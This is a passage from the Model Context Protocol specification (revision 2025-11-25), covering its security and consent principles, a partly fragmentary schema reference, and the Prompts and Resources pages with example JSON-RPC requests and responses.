* **Tools**: Functions for the AI model to execute
Clients may offer the following features to servers:
* **Sampling**: Server-initiated agentic behaviors and recursive LLM interactions
* **Roots**: Server-initiated inquiries into URI or filesystem boundaries to operate in
* **Elicitation**: Server-initiated requests for additional information from users
### Additional Utilities
* Configuration
* Progress tracking
* Cancellation
* Error reporting
* Logging
## Security and Trust & Safety
The Model Context Protocol enables powerful capabilities through arbitrary data access
and code execution paths. With this power comes important security and trust
considerations that all implementors must carefully address.
### Key Principles
1. **User Consent and Control**
* Users must explicitly consent to and understand all data access and operations
* Users must retain control over what data is shared and what actions are taken
* Implementors should provide clear UIs for reviewing and authorizing activities
2. **Data Privacy**
* Hosts must obtain explicit user consent before exposing user data to servers
* Hosts must not transmit resource data elsewhere without user consent
* User data should be protected with appropriate access controls
3. **Tool Safety**
* Tools represent arbitrary code execution and must be treated with appropriate
caution.
* In particular, descriptions of tool behavior such as annotations should be
considered untrusted, unless obtained from a trusted server.
* Hosts must obtain explicit user consent before invoking any tool
* Users should understand what each tool does before authorizing its use
4. **LLM Sampling Controls**
* Users must explicitly approve any LLM sampling requests
* Users should control:
* Whether sampling occurs at all
* The actual prompt that will be sent
* What results the server can see
* The protocol intentionally limits server visibility into prompts
### Implementation Guidelines
While MCP itself cannot enforce these security principles at the protocol level,
implementors **SHOULD**:
1. Build robust consent and authorization flows into their applications
2. Provide clear documentation of security implications
3. Implement appropriate access controls and data protections
4. Follow security best practices in their integrations
5. Consider privacy implications in their feature designs
## Learn More
Explore the detailed specification for each protocol component:
# Schema Reference
Source: https://modelcontextprotocol.io/specification/2025-11-25/schema
## JSON-RPC
Optional annotations for the client. The client can use annotations to inform how objects are used or displayed
audience?: Role\[]
Describes who the intended audience of this object or data is.
It can include multiple entries to indicate content useful for multiple audiences (e.g., \["user", "assistant"]).
priority?: number
Describes how important this data is for operating the server.
A value of 1 means "most important," and indicates that the data is
effectively required, while 0 means "least important," and indicates that
the data is entirely optional.
lastModified?: string
The moment the resource was last modified, as an ISO 8601 formatted string.
Should be an ISO 8601 formatted string (e.g., "2025-01-12T15:00:58Z").
Examples: last activity timestamp in an open file, timestamp when the resource
was attached, etc.
### `Cursor`
Cursor:string
An opaque token used to represent a cursor for pagination.
An optionally-sized icon that can be displayed in a user interface.
src: string
A standard URI pointing to an icon resource. May be an HTTP/HTTPS URL or a data: URI with Base64-encoded image data.
Consumers SHOULD takes steps to ensure URLs serving icons are from the
same domain as the client/server or a trusted domain.
Consumers SHOULD take appropriate precautions when consuming SVGs as they can contain
executable JavaScript.
mimeType?: string
Optional MIME type override if the source MIME type is missing or generic.
For example: "image/png", "image/jpeg", or "image/svg+xml".
sizes?: string\[]
Optional array of strings that specify sizes at which the icon can be used.
Each string should be in WxH format (e.g., "48x48", "96x96") or "any" for scalable formats like SVG.
If not provided, the client should assume that the icon can be used at any size.
theme?: "light" | "dark"
Optional specifier for the theme this icon is designed for. light indicates
the icon is designed to be used with a light background, and dark indicates
the icon is designed to be used with a dark background.
If not provided, the client should assume the icon can be used with any theme.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
ref: PromptReference | ResourceTemplateReference
argument: \{ name: string; value: string }
The argument's information
Type Declaration
name: string
The name of the argument
value: string
The value of the argument to use for completion matching.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
The submitted form data, only present when action is "accept" and mode was "form".
Contains values matching the requested schema.
Omitted for out-of-band mode responses.
The parameters for a request to elicit non-sensitive information from the user via a form in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode?: "form"
The elicitation mode.
message: string
The message to present to the user describing what information is being requested.
The parameters for a request to elicit information from the user via a URL in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode: "url"
The elicitation mode.
message: string
The message to present to the user explaining why the interaction is needed.
elicitationId: string
The ID of the elicitation, which must be unique within the context of the server.
The client MUST treat this ID as an opaque value.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
protocolVersion: string
The latest version of the Model Context Protocol that the client supports. The client MAY decide to support older versions as well.
The version of the Model Context Protocol that the server wants to use. This may not match the version that the client requested. If the client cannot support this version, it MUST disconnect.
capabilities: ServerCapabilities
serverInfo: Implementation
instructions?: string
Instructions describing how to use the server and its features.
This can be used by clients to improve the LLM's understanding of available tools, resources, etc. It can be thought of like a "hint" to the model. For example, this information MAY be added to the system prompt.
Capabilities a client may support. Known capabilities are defined here, in this schema, but this is not a closed set: any client can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the client supports.
roots?: \{ listChanged?: boolean }
Present if the client supports listing roots.
Type Declaration
OptionallistChanged?: boolean
Whether the client supports notifications for changes to the roots list.
sampling?: \{ context?: object; tools?: object }
Present if the client supports sampling from an LLM.
Type Declaration
Optionalcontext?: object
Whether the client supports context inclusion via includeContext parameter.
If not declared, servers SHOULD only use includeContext: "none" (or omit it).
Optionaltools?: object
Whether the client supports tool use via tools and toolChoice parameters.
elicitation?: \{ form?: object; url?: object }
Present if the client supports elicitation from the server.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
version: string
description?: string
An optional human-readable description of what this implementation does.
This can be used by clients or servers to provide context about their purpose
and capabilities. For example, a server might describe the types of resources
or tools it provides, while a client might describe its intended use case.
websiteUrl?: string
An optional URL of the website for this implementation.
Capabilities that a server may support. Known capabilities are defined here, in this schema, but this is not a closed set: any server can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the server supports.
logging?: object
Present if the server supports sending log messages to the client.
completions?: object
Present if the server supports argument autocompletion suggestions.
prompts?: \{ listChanged?: boolean }
Present if the server offers any prompt templates.
Type Declaration
OptionallistChanged?: boolean
Whether this server supports notifications for changes to the prompt list.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
level: LoggingLevel
The level of logging that the client wants to receive from the server. The server should send all logs at this level and higher (i.e., more severe) to the client as notifications/message.
This notification can be sent by either side to indicate that it is cancelling a previously-issued request.
The request SHOULD still be in-flight, but due to communication latency, it is always possible that this notification MAY arrive after the request has already finished.
This notification indicates that the result will be unused, so any associated processing SHOULD cease.
A client MUST NOT attempt to cancel its initialize request.
For task cancellation, use the tasks/cancel request instead of this notification.
This MUST correspond to the ID of a request previously issued in the same direction.
This MUST be provided for cancelling non-task requests.
This MUST NOT be used for cancelling tasks (use the tasks/cancel request instead).
reason?: string
An optional string describing the reason for the cancellation. This MAY be logged or presented to the user.
An optional notification from the receiver to the requestor, informing them that a task's status has changed. Receivers are not required to send these notifications.
JSONRPCNotification of a log message passed from server to client. If no logging/setLevel request has been sent from the client, the server MAY decide which messages to send automatically.
An optional notification from the server to the client, informing it that the list of prompts it offers has changed. This may be issued by servers without any previous subscription from the client.
An optional notification from the server to the client, informing it that the list of resources it can read from has changed. This may be issued by servers without any previous subscription from the client.
A notification from the server to the client, informing it that a resource has changed and may need to be read again. This should only be sent if the client previously sent a resources/subscribe request.
A notification from the client to the server, informing it that the list of roots has changed.
This notification should be sent whenever the client adds, removes, or modifies any root.
The server should then request an updated list of roots using the ListRootsRequest.
An optional notification from the server to the client, informing it that the list of tools it offers has changed. This may be issued by servers without any previous subscription from the client.
A ping, issued by either the server or the client, to check that the other party is still alive. The receiver must promptly respond, or else may be disconnected.
The response to a tasks/result request.
The structure matches the result type of the original request.
For example, a tools/call task would return the CallToolResult structure.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
An optional description of what this prompt provides
arguments?: PromptArgument\[]
A list of arguments to use for templating the prompt.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uriTemplate: string
A URI template (according to RFC 6570) that can be used to construct resource URIs.
description?: string
A description of what this template is for.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type for all resources that match this template. This should only be included if all resources matching this template have the same type.
Sent from the client to request cancellation of resources/updated notifications from the server. This should follow a previous resources/subscribe request.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
Sent from the server to request a list of root URIs from the client. Roots allow
servers to ask for specific directories or files to operate on. A common example
for roots is providing a set of repositories or directories a server should operate
on.
This request is typically used when the server needs to understand the file system
structure or access specific locations that the client has permission to read from.
The client's response to a roots/list request from the server.
This result contains an array of Root objects, each representing a root directory
or file that the server can operate on.
Represents a root directory or file that the server can operate on.
uri: string
The URI identifying the root. This must start with file:// for now.
This restriction may be relaxed in future versions of the protocol to allow
other URI schemes.
name?: string
An optional name for the root. This can be used to provide a human-readable
identifier for the root, which may be useful for display purposes or for
referencing the root in other parts of the application.
A request from the server to sample an LLM via the client. The client has full discretion over which model to select. The client should also inform the user before beginning sampling, to allow them to inspect the request (human in the loop) and decide whether to approve it.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
messages: SamplingMessage\[]
modelPreferences?: ModelPreferences
The server's preferences for which model to select. The client MAY ignore these preferences.
systemPrompt?: string
An optional system prompt the server wants to use for sampling. The client MAY modify or omit this prompt.
A request to include context from one or more MCP servers (including the caller), to be attached to the prompt.
The client MAY ignore this request.
Default is "none". Values "thisServer" and "allServers" are soft-deprecated. Servers SHOULD only use these values if the client
declares ClientCapabilities.sampling.context. These values may be removed in future spec releases.
temperature?: number
maxTokens: number
The requested maximum number of tokens to sample (to prevent runaway completions).
The client MAY choose to sample fewer tokens than the requested maximum.
stopSequences?: string\[]
metadata?: object
Optional metadata to pass through to the LLM provider. The format of this metadata is provider-specific.
tools?: Tool\[]
Tools that the model may use during generation.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
toolChoice?: ToolChoice
Controls how the model uses tools.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
Default is \{ mode: "auto" }.
The client's response to a sampling/createMessage request from the server.
The client should inform the user before returning the sampled message, to allow them
to inspect the response (human in the loop) and decide whether to allow the server to see it.
The server's preferences for model selection, requested of the client during sampling.
Because LLMs can vary along multiple dimensions, choosing the "best" model is
rarely straightforward. Different models excel in different areas—some are
faster but less capable, others are more capable but more expensive, and so
on. This interface allows servers to express their priorities across multiple
dimensions to help clients make an appropriate selection for their use case.
These preferences are always advisory. The client MAY ignore them. It is also
up to the client to decide how to interpret these preferences and how to
balance them against other considerations.
hints?: ModelHint\[]
Optional hints to use for model selection.
If multiple hints are specified, the client MUST evaluate them in order
(such that the first match is taken).
The client SHOULD prioritize these hints over the numeric priorities, but
MAY still use the priorities to select from ambiguous matches.
costPriority?: number
How much to prioritize cost when selecting a model. A value of 0 means cost
is not important, while a value of 1 means cost is the most important
factor.
speedPriority?: number
How much to prioritize sampling speed (latency) when selecting a model. A
value of 0 means speed is not important, while a value of 1 means speed is
the most important factor.
intelligencePriority?: number
How much to prioritize intelligence and capabilities when selecting a
model. A value of 0 means intelligence is not important, while a value of 1
means intelligence is the most important factor.
The result of a tool use, provided by the user back to the assistant.
type: "tool\_result"
toolUseId: string
The ID of the tool use this result corresponds to.
This MUST match the ID from a previous ToolUseContent.
content: ContentBlock\[]
The unstructured result content of the tool use.
This has the same format as CallToolResult.content and can include text, images,
audio, resource links, and embedded resources.
structuredContent?: \{ \[key: string]: unknown }
An optional structured result object.
If the tool defined an outputSchema, this SHOULD conform to that schema.
isError?: boolean
Whether the tool use resulted in an error.
If true, the content typically describes the error that occurred.
Default: false
\_meta?: \{ \[key: string]: unknown }
Optional metadata about the tool result. Clients SHOULD preserve this field when
including tool results in subsequent sampling requests to enable caching optimizations.
This ID is used to match tool results to their corresponding tool uses.
name: string
The name of the tool to call.
input: \{ \[key: string]: unknown }
The arguments to pass to the tool, conforming to the tool's input schema.
\_meta?: \{ \[key: string]: unknown }
Optional metadata about the tool use. Clients SHOULD preserve this field when
including tool uses in subsequent sampling requests to enable caching optimizations.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
A list of content objects that represent the unstructured result of the tool call.
structuredContent?: \{ \[key: string]: unknown }
An optional JSON object that represents the structured result of the tool call.
isError?: boolean
Whether the tool call ended in an error.
If not set, this is assumed to be false (the call was successful).
Any errors that originate from the tool SHOULD be reported inside the result
object, with isError set to true, not as an MCP protocol-level error
response. Otherwise, the LLM would not be able to see that an error occurred
and self-correct.
However, any errors in finding the tool, an error indicating that the
server does not support tool calls, or any other exceptional conditions,
should be reported as an MCP error response.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
A human-readable description of the tool.
This can be used by clients to improve the LLM's understanding of available tools. It can be thought of like a "hint" to the model.
Additional properties describing a Tool to clients.
NOTE: all properties in ToolAnnotations are hints.
They are not guaranteed to provide a faithful description of
tool behavior (including descriptive properties like title).
Clients should never make tool use decisions based on ToolAnnotations
received from untrusted servers.
title?: string
A human-readable title for the tool.
readOnlyHint?: boolean
If true, the tool does not modify its environment.
Default: false
destructiveHint?: boolean
If true, the tool may perform destructive updates to its environment.
If false, the tool performs only additive updates.
(This property is meaningful only when readOnlyHint == false)
Default: true
idempotentHint?: boolean
If true, calling the tool repeatedly with the same arguments
will have no additional effect on its environment.
(This property is meaningful only when readOnlyHint == false)
Default: false
openWorldHint?: boolean
If true, this tool may interact with an "open world" of external
entities. If false, the tool's domain of interaction is closed.
For example, the world of a web search tool is open, whereas that
of a memory tool is not.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/index
**Protocol Revision**: 2025-11-25
Servers provide the fundamental building blocks for adding context to language models via
MCP. These primitives enable rich interactions between clients, servers, and language
models:
* **Prompts**: Pre-defined templates or instructions that guide language model
interactions
* **Resources**: Structured data or content that provides additional context to the model
* **Tools**: Executable functions that allow models to perform actions or retrieve
information
Each primitive can be summarized in the following control hierarchy:
| Primitive | Control | Description | Example |
| --------- | ---------------------- | -------------------------------------------------- | ------------------------------- |
| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options |
| Resources | Application-controlled | Contextual data attached and managed by the client | File contents, git history |
| Tools | Model-controlled | Functions exposed to the LLM to take actions | API POST requests, file writing |
Explore these key primitives in more detail below:
# Prompts
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/prompts
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose prompt
templates to clients. Prompts allow servers to provide structured messages and
instructions for interacting with language models. Clients can discover available
prompts, retrieve their contents, and provide arguments to customize them.
## User Interaction Model
Prompts are designed to be **user-controlled**, meaning they are exposed from servers to
clients with the intention of the user being able to explicitly select them for use.
Typically, prompts would be triggered through user-initiated commands in the user
interface, which allows users to naturally discover and invoke available prompts.
For example, as slash commands:
However, implementors are free to expose prompts through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
## Capabilities
Servers that support prompts **MUST** declare the `prompts` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"prompts": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available prompts changes.
## Protocol Messages
### Listing Prompts
To retrieve available prompts, clients send a `prompts/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "prompts/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"prompts": [
{
"name": "code_review",
"title": "Request Code Review",
"description": "Asks the LLM to analyze code quality and suggest improvements",
"arguments": [
{
"name": "code",
"description": "The code to review",
"required": true
}
],
"icons": [
{
"src": "https://example.com/review-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Getting a Prompt
To retrieve a specific prompt, clients send a `prompts/get` request. Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "prompts/get",
"params": {
"name": "code_review",
"arguments": {
"code": "def hello():\n print('world')"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"description": "Code review prompt",
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "Please review this Python code:\ndef hello():\n print('world')"
}
}
]
}
}
```
### List Changed Notification
When the list of available prompts changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/prompts/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: prompts/list
Server-->>Client: List of prompts
Note over Client,Server: Usage
Client->>Server: prompts/get
Server-->>Client: Prompt content
opt listChanged
Note over Client,Server: Changes
Server--)Client: prompts/list_changed
Client->>Server: prompts/list
Server-->>Client: Updated prompts
end
```
## Data Types
### Prompt
A prompt definition includes:
* `name`: Unique identifier for the prompt
* `title`: Optional human-readable name of the prompt for display purposes.
* `description`: Optional human-readable description
* `icons`: Optional array of icons for display in user interfaces
* `arguments`: Optional list of arguments for customization
### PromptMessage
Messages in a prompt can contain:
* `role`: Either "user" or "assistant" to indicate the speaker
* `content`: One of the following content types:
All content types in prompt messages support optional
[annotations](./resources#annotations) for metadata about audience, priority,
and modification times.
#### Text Content
Text content represents plain text messages:
```json theme={null}
{
"type": "text",
"text": "The text content of the message"
}
```
This is the most common content type used for natural language interactions.
#### Image Content
Image content allows including visual information in messages:
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/png"
}
```
The image data **MUST** be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where visual context is important.
#### Audio Content
Audio content allows including audio information in messages:
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
The audio data MUST be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where audio context is important.
#### Embedded Resources
Embedded resources allow referencing server-side resources directly in messages:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "resource://example",
"mimeType": "text/plain",
"text": "Resource content"
}
}
```
Resources can contain either text or binary (blob) data and **MUST** include:
* A valid resource URI
* The appropriate MIME type
* Either text content or base64-encoded blob data
Embedded resources enable prompts to seamlessly incorporate server-managed content like
documentation, code samples, or other reference materials directly into the conversation
flow.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD** validate prompt arguments before processing
2. Clients **SHOULD** handle pagination for large prompt lists
3. Both parties **SHOULD** respect capability negotiation
## Security
Implementations **MUST** carefully validate all prompt inputs and outputs to prevent
injection attacks or unauthorized access to resources.
# Resources
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/resources
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose
resources to clients. Resources allow servers to share data that provides context to
language models, such as files, database schemas, or application-specific information.
Each resource is uniquely identified by a
[URI](https://datatracker.ietf.org/doc/html/rfc3986).
## User Interaction Model
Resources in MCP are designed to be **application-driven**, with host applications
determining how to incorporate context based on their needs.
For example, applications could:
* Expose resources through UI elements for explicit selection, in a tree or list view
* Allow the user to search through and filter available resources
* Implement automatic context inclusion, based on heuristics or the AI model's selection
However, implementations are free to expose resources through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support resources **MUST** declare the `resources` capability:
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true,
"listChanged": true
}
}
}
```
The capability supports two optional features:
* `subscribe`: whether the client can subscribe to be notified of changes to individual
resources.
* `listChanged`: whether the server will emit notifications when the list of available
resources changes.
Both `subscribe` and `listChanged` are optional—servers can support neither,
either, or both:
```json theme={null}
{
"capabilities": {
"resources": {} // Neither feature supported
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true // Only subscriptions supported
}
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"listChanged": true // Only list change notifications supported
}
}
}
```
## Protocol Messages
### Listing Resources
To discover available resources, clients send a `resources/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "resources/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"resources": [
{
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"title": "Rust Software Application Main File",
"description": "Primary application entry point",
"mimeType": "text/x-rust",
"icons": [
{
"src": "https://example.com/rust-file-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Reading Resources
To retrieve resource contents, clients send a `resources/read` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "resources/read",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"contents": [
{
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}"
}
]
}
}
```
### Resource Templates
Resource templates allow servers to expose parameterized resources using
[URI templates](https://datatracker.ietf.org/doc/html/rfc6570). Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "resources/templates/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"resourceTemplates": [
{
"uriTemplate": "file:///{path}",
"name": "Project Files",
"title": "📁 Project Files",
"description": "Access files in the project directory",
"mimeType": "application/octet-stream",
"icons": [
{
"src": "https://example.com/folder-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
]
}
}
```
### List Changed Notification
When the list of available resources changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/list_changed"
}
```
### Subscriptions
The protocol supports optional subscriptions to resource changes. Clients can subscribe
to specific resources and receive notifications when they change:
**Subscribe Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "resources/subscribe",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Update Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/updated",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Resource Discovery
Client->>Server: resources/list
Server-->>Client: List of resources
Note over Client,Server: Resource Template Discovery
Client->>Server: resources/templates/list
Server-->>Client: List of resource templates
Note over Client,Server: Resource Access
Client->>Server: resources/read
Server-->>Client: Resource contents
Note over Client,Server: Subscriptions
Client->>Server: resources/subscribe
Server-->>Client: Subscription confirmed
Note over Client,Server: Updates
Server--)Client: notifications/resources/updated
Client->>Server: resources/read
Server-->>Client: Updated contents
```
## Data Types
### Resource
A resource definition includes:
* `uri`: Unique identifier for the resource
* `name`: The name of the resource.
* `title`: Optional human-readable name of the resource for display purposes.
* `description`: Optional description
* `icons`: Optional array of icons for display in user interfaces
* `mimeType`: Optional MIME type
* `size`: Optional size in bytes
### Resource Contents
Resources can contain either text or binary data:
#### Text Content
```json theme={null}
{
"uri": "file:///example.txt",
"mimeType": "text/plain",
"text": "Resource content"
}
```
#### Binary Content
```json theme={null}
{
"uri": "file:///example.png",
"mimeType": "image/png",
"blob": "base64-encoded-data"
}
```
### Annotations
Resources, resource templates and content blocks support optional annotations that provide hints to clients about how to use or display the resource:
* **`audience`**: An array indicating the intended audience(s) for this resource. Valid values are `"user"` and `"assistant"`. For example, `["user", "assistant"]` indicates content useful for both.
* **`priority`**: A number from 0.0 to 1.0 indicating the importance of this resource. A value of 1 means "most important" (effectively required), while 0 means "least important" (entirely optional).
* **`lastModified`**: An ISO 8601 formatted timestamp indicating when the resource was last modified (e.g., `"2025-01-12T15:00:58Z"`).
Example resource with annotations:
```json theme={null}
{
"uri": "file:///project/README.md",
"name": "README.md",
"title": "Project Documentation",
"mimeType": "text/markdown",
"annotations": {
"audience": ["user"],
"priority": 0.8,
"lastModified": "2025-01-12T15:00:58Z"
}
}
```
Clients can use these annotations to:
* Filter resources based on their intended audience
* Prioritize which resources to include in context
* Display modification times or sort by recency
## Common URI Schemes
The protocol defines several standard URI schemes. This list not
exhaustive—implementations are always free to use additional, custom URI schemes.
### https\://
Used to represent a resource available on the web.
Servers **SHOULD** use this scheme only when the client is able to fetch and load the
resource directly from the web on its own—that is, it doesn’t need to read the resource
via the MCP server.
For other use cases, servers **SHOULD** prefer to use another URI scheme, or define a
custom one, even if the server will itself be downloading resource contents over the
internet.
### file://
Used to identify resources that behave like a filesystem. However, the resources do not
need to map to an actual physical filesystem.
